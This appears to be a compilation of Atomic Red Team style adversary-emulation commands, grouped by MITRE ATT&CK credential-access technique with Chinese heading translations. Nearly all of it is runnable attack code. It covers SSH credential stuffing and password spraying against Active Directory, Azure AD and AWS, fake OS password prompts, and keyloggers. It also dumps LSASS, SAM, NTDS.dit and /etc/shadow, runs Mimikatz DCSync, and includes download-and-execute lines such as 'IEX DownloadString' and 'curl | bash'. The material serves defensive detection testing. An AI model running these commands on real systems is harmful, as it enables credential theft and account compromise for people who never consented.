for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done

Brute Force: Credential Stuffing using Kerbrute Tool

cd PathToAtomicsFolder\..\ExternalPayloads
.\kerbrute.exe bruteforce --dc #{domaincontroller} -d #{domain} PathToAtomicsFolder\..\ExternalPayloads\bruteforce.txt

T1110.003

Brute Force: Password Spraying

暴力破解:密码喷洒

Password Spray all Domain Users

@FOR /F %n in (%temp%\users.txt) do @echo | set/p=. & @net use %logonserver%\IPC$ /user:"%userdomain%\%n" "#{password}" 1>NUL 2>&1 && @echo [*] %n:#{password} && @net use /delete %logonserver%\IPC$ > NUL

Password Spray (DomainPasswordSpray)

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/94cb72506b9e2768196c8b6a4b7af63cebc47d88/DomainPasswordSpray.ps1' -UseBasicParsing); Invoke-DomainPasswordSpray -Password Spring2017 -Domain #{domain} -Force

Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos)

if ("#{auth}".ToLower() -NotIn @("ntlm","kerberos")) {
  Write-Host "Only 'NTLM' and 'Kerberos' auth methods are supported"
  exit 1
}

$DomainUsers = Get-ADUser -LDAPFilter '(&(sAMAccountType=805306368)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))' -Server #{domain} | Select-Object -ExpandProperty SamAccountName

[System.Reflection.Assembly]::LoadWithPartialName("System.DirectoryServices.Protocols") | Out-Null
$di = new-object System.DirectoryServices.Protocols.LdapDirectoryIdentifier("#{domain}",389)

$DomainUsers | Foreach-Object {
  $user = $_
  $password = '#{password}'

  $credz = new-object System.Net.NetworkCredential($user, $password, "#{domain}")
  $conn = new-object System.DirectoryServices.Protocols.LdapConnection($di, $credz, [System.DirectoryServices.Protocols.AuthType]::#{auth})
  try {
    Write-Host " [-] Attempting ${password} on account ${user}."
    $conn.bind()
    # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success
    Write-Host " [!] ${user}:${password} are valid credentials!"
  } catch {
    Write-Host $_.Exception.Message
  }
}
Write-Host "End of password spraying"

Password spray all Azure AD users with a single password

Import-Module -Name AzureAD
$PWord = ConvertTo-SecureString -String "#{valid_password}" -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{valid_username}", $Pword
Connect-AzureAD -Credential $Credential > $null

($Users = Get-AzureADUser -All $true) > $null
Disconnect-AzureAD > $null
$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force

$Users | Foreach-Object {
  $user = $_.UserPrincipalName
  $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "$user", $Pword
  try {
    Write-Host " [-] Attempting #{password} on account ${user}."
    Connect-AzureAD -Credential $Credential 2>&1> $null
    # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success
    Write-Host " [!] ${user}:#{password} are valid credentials!`r`n"
    Disconnect-AzureAD > $null
  } catch {
    Write-Host " [-] ${user}:#{password} invalid credentials.`r`n"
  }
}
Write-Host "End of password spraying"

WinPwn - DomainPasswordSpray Attacks

$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
domainpassspray -consoleoutput -noninteractive -emptypasswords

Password Spray Invoke-DomainPasswordSpray Light

function Invoke-dpsLight ($Password, $userlist) {
$users = Get-Content $userlist
$Domain = "LDAP://" + ([ADSI]"").distinguishedName
foreach ($User in $users) {
  $Domain_check = New-Object System.DirectoryServices.DirectoryEntry($Domain, $User, $Password)
  if ($Domain_check.name -ne $null) {
    Write-Host -ForegroundColor Green "Password found for User:$User Password:$Password"
  }
  else { Write-Host ". " -NoNewline}
}
Write-Host -ForegroundColor green "Finished"
}
Invoke-dpsLight "#{password}" $env:Temp\usersdpsLight.txt

Password Spray Microsoft Online Accounts with MSOLSpray (Azure/O365)

import-module "PathToAtomicsFolder\..\ExternalPayloads\MSOLSpray.ps1"
Invoke-MSOLSpray -UserList "#{user_list}" -Password "#{password}"

Password Spray using Kerbrute Tool

cd PathToAtomicsFolder\..\ExternalPayloads
.\kerbrute.exe passwordspray --dc #{domaincontroller} -d #{domain} PathToAtomicsFolder\..\ExternalPayloads\passwordspray.txt password132

AWS - Password Spray an AWS using GoAWSConsoleSpray

cd /tmp
git clone git@github.com:WhiteOakSecurity/GoAWSConsoleSpray.git
cd /tmp/GoAWSConsoleSpray
go run main.go GoAWSConsoleSpray -a #{aws_account_id} -u PathToAtomicsFolder/T1110.003/src/aws_users.txt -p PathToAtomicsFolder/T1110.003/src/aws_passwords.txt

T1110.002

Brute Force: Password Cracking

暴力破解:密码爆破

Password Cracking with Hashcat

cd #{hashcat_exe}\..
#{hashcat_exe} -a 0 -m 1000 -r .\rules\Incisive-leetspeak.rule #{input_file_sam} #{input_file_passwords}

T1110.001

Brute Force: Password Guessing

暴力破解:密码猜解

Brute Force Credentials of single Active Directory domain users via SMB

echo Password1> passwords.txt
echo 1q2w3e4r>> passwords.txt
echo Password!>> passwords.txt
echo Spring2022>> passwords.txt
echo ChangeMe!>> passwords.txt
@FOR /F "delims=" %p in (passwords.txt) DO @net use %logonserver%\IPC$ /user:"%userdomain%\#{user}" "%p" 1>NUL 2>&1 && @echo [*] #{user}:%p && @net use /delete %logonserver%\IPC$ > NUL

Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos)

if ("#{auth}".ToLower() -NotIn @("ntlm","kerberos")) {
  Write-Host "Only 'NTLM' and 'Kerberos' auth methods are supported"
  exit 1
}

[System.Reflection.Assembly]::LoadWithPartialName("System.DirectoryServices.Protocols") | Out-Null
$di = new-object System.DirectoryServices.Protocols.LdapDirectoryIdentifier("#{domain}",389)

$passwordList = Get-Content -Path #{passwords_path}
foreach ($password in $passwordList){
  $credz = new-object System.Net.NetworkCredential("#{user}", $password, "#{domain}")
  $conn = new-object System.DirectoryServices.Protocols.LdapConnection($di, $credz, [System.DirectoryServices.Protocols.AuthType]::#{auth})
  try {
    Write-Host " [-] Attempting ${password} on account #{user}."
    $conn.bind()
    # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success
    Write-Host " [!] #{user}:${password} are valid credentials!"
  } catch {
    Write-Host $_.Exception.Message
  }
}
Write-Host "End of bruteforce"

Brute Force Credentials of single Azure AD user

Import-Module -Name AzureAD

$passwords = "#{passwords}".split("{`n}")
foreach($password in $passwords) {
  $PWord = ConvertTo-SecureString -String "$password" -AsPlainText -Force
  $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
  try {
    Write-Host " [-] Attempting ${password} on account #{username}."
    Connect-AzureAD -Credential $Credential 2>&1> $null
    # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success
    Write-Host " [!] #{username}:${password} are valid credentials!`r`n"
    break
  } catch {
    Write-Host " [-] #{username}:${password} invalid credentials.`r`n"
  }
}
Write-Host "End of bruteforce"

Password Brute User using Kerbrute Tool

cd PathToAtomicsFolder\..\ExternalPayloads
.\kerbrute.exe bruteuser --dc #{domaincontroller} -d #{domain} $env:temp\bruteuser.txt TestUser1

SUDO Brute Force - Debian

useradd -G sudo -s /bin/bash -p $(openssl passwd -1 password123) art
su art
cd /tmp
curl -s #{remote_url} |bash

SUDO Brute Force - Redhat

useradd -G wheel -s /bin/bash -p $(openssl passwd -1 password123) art
su art
cd /tmp
curl -s #{remote_url} |bash

T1056.004

Input Capture: Credential API Hooking

输入捕获:凭据 API Hooking

Hook PowerShell TLS Encrypt/Decrypt Messages

mavinject $pid /INJECTRUNNING #{file_name}
Invoke-WebRequest #{server_name} -UseBasicParsing

T1056.002

Input Capture: GUI Input Capture

输入捕获:图形界面输入捕获

AppleScript - Prompt User for Password

osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to display dialog "Software Update requires that you type your password to apply changes." & return & return  default answer "" with icon 1 with hidden answer with title "Software Update"'

PowerShell - Prompt User for Password

# Creates GUI to prompt for password. Expect long pause before prompt is available.    
$cred = $host.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName)
# Using write-warning to allow message to show on console as echo and other similar commands are not visable from the Invoke-AtomicTest framework.
write-warning $cred.GetNetworkCredential().Password

T1056.001

Input Capture: Keylogging

输入捕获:键盘记录

Input Capture

$PathToAtomicsFolder\T1056.001\src\Get-Keystrokes.ps1 -LogPath #{filepath}

Living off the land Terminal Input Capture on Linux with pam.d

if sudo test -f /etc/pam.d/password-auth; then sudo cp /etc/pam.d/password-auth /tmp/password-auth.bk; fi;
if sudo test -f /etc/pam.d/system-auth; then sudo cp /etc/pam.d/system-auth /tmp/system-auth.bk; fi;
sudo touch /tmp/password-auth.bk
sudo touch /tmp/system-auth.bk sudo echo "session    required    pam_tty_audit.so
enable=* log_password" >> /etc/pam.d/password-auth sudo echo "session    required    pam_tty_audit.so
enable=* log_password" >> /etc/pam.d/system-auth

Logging bash history to syslog

PROMPT_COMMAND='history -a >(tee -a ~/.bash_history |logger -t "$USER[$$] $SSH_CONNECTION ")'
echo "\$PROMPT_COMMAND=$PROMPT_COMMAND"
tail /var/log/syslog

Bash session based keylogger

trap 'echo "$(date +"%d/%m/%y %H:%M:%S.%s") $USER $BASH_COMMAND" >> #{output_file}' DEBUG
echo "Hello World!"
cat #{output_file}

SSHD PAM keylogger

cp -v /etc/pam.d/sshd /tmp/
echo "session required pam_tty_audit.so disable=* enable=* open_only log_passwd" >> /etc/pam.d/sshd
systemctl restart sshd
systemctl restart auditd
ssh #{user_account}@localhost 
whoami
sudo su
whoami
exit
exit

Auditd keylogger

auditctl -a always,exit -F arch=b64 -S execve -k CMDS 
auditctl -a always,exit -F arch=b32 -S execve -k CMDS
whoami; ausearch -i --start $(date +"%d/%m/%y %H:%M:%S")

MacOS Swift Keylogger

swift PathToAtomicsFolder/T1056.001/src/MacOSKeylogger.swift -keylog

T1003

OS Credential Dumping

操作系统凭据转储

Gsecdump

gsecdump.exe -a

Credential Dumping with NPPSpy

Copy-Item "PathToAtomicsFolder\ExternalPayloads\NPPSPY.dll" -Destination "C:\Windows\System32"
$path = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order" -Name PROVIDERORDER
$UpdatedValue = $Path.PROVIDERORDER + ",NPPSpy"
Set-ItemProperty -Path $Path.PSPath -Name "PROVIDERORDER" -Value $UpdatedValue
$rv = New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy -ErrorAction Ignore
$rv = New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -ErrorAction Ignore
$rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "Class" -Value 2 -ErrorAction Ignore
$rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "Name" -Value NPPSpy -ErrorAction Ignore
$rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "ProviderPath" -PropertyType ExpandString -Value "%SystemRoot%\System32\NPPSPY.dll" -ErrorAction Ignore
echo "[!] Please, logout and log back in. Cleartext password for this account is going to be located in C:\NPPSpy.txt"

Dump svchost.exe to gather RDP credentials

$ps = (Get-NetTCPConnection -LocalPort 3389 -State Established -ErrorAction Ignore)
if($ps){$id = $ps[0].OwningProcess} else {$id = (Get-Process svchost)[0].Id }
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump $id $env:TEMP\svchost-exe.dmp full

Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)

C:\Windows\System32\inetsrv\appcmd.exe list apppool /@t:*
C:\Windows\System32\inetsrv\appcmd.exe list apppool /@text:*
C:\Windows\System32\inetsrv\appcmd.exe list apppool /text:*

Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)

C:\Windows\System32\inetsrv\appcmd.exe list apppool /config

Dump Credential Manager using keymgr. dll and rundll32. exe

rundll32.exe keymgr,KRShowKeyMgr

T1003.008

OS Credential Dumping: /etc/passwd and /etc/shadow

操作系统凭据获取:/etc/passwd and /etc/shadow

Access /etc/shadow (Local)

sudo cat /etc/shadow > #{output_file}
cat #{output_file}

Access /etc/passwd (Local)

cat /etc/passwd > #{output_file}
cat #{output_file}

Access /etc/{shadow, passwd} with a standard bin that's not cat

echo -e "e /etc/passwd\n,p\ne /etc/shadow\n,p\n" | ed > #{output_file}

Access /etc/{shadow, passwd} with shell builtins

function testcat(){ echo "$(< $1)"; }
testcat /etc/passwd > #{output_file}
testcat /etc/shadow > #{output_file}

T1003.007

OS Credential Dumping: Proc Filesystem

操作系统凭据转储:Proc 文件系统

Dump individual process memory with sh (Local)

sh #{script_path}
PID=$(pgrep -n -f "#{pid_term}")
HEAP_MEM=$(grep -E "^[0-9a-f-]* r" /proc/"$PID"/maps | grep heap | cut -d' ' -f 1)
MEM_START=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f1))))
MEM_STOP=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f2))))
MEM_SIZE=$(echo $((0x$MEM_STOP-0x$MEM_START)))
dd if=/proc/"${PID}"/mem of="#{output_file}" ibs=1 skip="$MEM_START" count="$MEM_SIZE"
grep -i "PASS" "#{output_file}"

Dump individual process memory with Python (Local)

sh #{script_path}
PID=$(pgrep -n -f "#{pid_term}")
PYTHON=$(which python || which python3 || which python2)
$PYTHON #{python_script} $PID #{output_file}
grep -i "PASS" "#{output_file}"

Capture Passwords with MimiPenguin

sudo /tmp/mimipenguin/mimipenguin_2.0-release/mimipenguin.sh > #{output_file}
cat #{output_file}

T1003.006

OS Credential Dumping: DCSync

操作系统凭据转储:DCSync

DCSync (Active Directory)

#{mimikatz_path} "lsadump::dcsync /domain:#{domain} /user:#{user}@#{domain}" "exit"

Run DSInternals Get-ADReplAccount

Get-ADReplAccount -All -Server #{logonserver}

T1003.005

OS Credential Dumping: Cached Domain Credentials

操作系统凭据转储:cache 域名凭据

Cached Credential Dump via Cmdkey

cmdkey /list

T1003.004

OS Credential Dumping: LSA Secrets

操作系统凭据转储:Lsa Secrets

Dumping LSA Secrets

#{psexec_exe} -accepteula -s reg save HKLM\security\policy\secrets %temp%\secrets /y

T1003.003

OS Credential Dumping: NTDS

操作系统凭据转储:NTDS

Create Volume Shadow Copy with vssadmin

vssadmin.exe create shadow /for=#{drive_letter}

Copy NTDS.dit from Volume Shadow Copy

copy #{vsc_name}\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit
copy #{vsc_name}\Windows\System32\config\SYSTEM #{extract_path}\VSC_SYSTEM_HIVE
reg save HKLM\SYSTEM #{extract_path}\SYSTEM_HIVE

Dump Active Directory Database with NTDSUtil

mkdir #{output_folder}
ntdsutil "ac i ntds" "ifm" "create full #{output_folder}" q q

Create Volume Shadow Copy with WMI

wmic shadowcopy call create Volume=#{drive_letter}

Create Volume Shadow Copy remotely with WMI

wmic /node:"#{target_host}" shadowcopy call create Volume=#{drive_letter}

Create Volume Shadow Copy remotely (WMI) with esentutl

wmic /node:"#{target_host}" process call create "cmd.exe /c esentutl.exe /y /vss #{source_path} /d #{target_path}"

Create Volume Shadow Copy with Powershell

(gwmi -list win32_shadowcopy).Create('#{drive_letter}','ClientAccessible')

vssadmin.exe create shadow /for=#{drive_letter}
mklink /D #{symlink_path} \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1

T1003.002

OS Credential Dumping: Security Account Manager

操作系统凭据转储:安全管理账户(SAM)

Registry dump of SAM, creds, and secrets

reg save HKLM\sam %temp%\sam
reg save HKLM\system %temp%\system
reg save HKLM\security %temp%\security

Registry parse with pypykatz

pypykatz live registry

esentutl.exe SAM copy

esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name}

PowerDump Hashes and Usernames from Registry

Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green
Import-Module "PathToAtomicsFolder\..\ExternalPayloads\PowerDump.ps1"
Invoke-PowerDump

dump volume shadow copy hives with certutil

for /L %a in (1,1,#{limit}) do @(certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy%a\Windows\System32\config\#{target_hive}" %temp%\#{target_hive}vss%a 2 >nul 2>&1) && dir /B %temp%\#{target_hive}vss%a

dump volume shadow copy hives with System. IO. File

1..#{limit} | % { 
 try { [System.IO.File]::Copy("\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy$_\Windows\System32\config\#{target_hive}" , "$env:TEMP\#{target_hive}vss$_", "true") } catch {}
 ls "$env:TEMP\#{target_hive}vss$_" -ErrorAction Ignore
}

WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes

$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
samfile -consoleoutput -noninteractive

T1003.001

OS Credential Dumping: LSASS Memory

操作系统凭据转储:Lsass Memory

Dump LSASS. exe Memory using ProcDump

#{procdump_exe} -accepteula -ma lsass.exe #{output_file}

Dump LSASS. exe Memory using comsvcs. dll

C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full

Dump LSASS. exe Memory using direct system calls and API unhooking

PathToAtomicsFolder\..\ExternalPayloads\Outflank-Dumpert.exe

Dump LSASS. exe Memory using NanoDump

%temp%\nanodump.x64.exe -w "%temp%\nanodump.dmp"

Dump LSASS. exe Memory using Windows Task Manager

1. Open Task Manager: On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking on the task bar and selecting "Task Manager".
    
2. Select lsass.exe: If lsass.exe is not visible, select "Show processes from all users". This will allow you to observe execution of lsass.exe and select it for manipulation.
    
3. Dump lsass.exe memory: Right-click on lsass.exe in Task Manager. Select "Create Dump File". The following dialog will show you the path to the saved file.

Offline Credential Theft With Mimikatz

#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit

LSASS read with pypykatz

pypykatz live lsa

Dump LSASS. exe Memory using Out-Minidump. ps1

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
IEX (New-Object Net.WebClient).DownloadString('https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1'); get-process lsass | Out-Minidump

Create Mini Dump of LSASS. exe using ProcDump

#{procdump_exe} -accepteula -mm lsass.exe #{output_file}

Powershell Mimikatz

IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds

Dump LSASS with createdump. exe from . Net v5

$exePath =  resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id

Dump LSASS. exe using imported Microsoft DLLs

#{xordump_exe} -out #{output_file} -x 0x41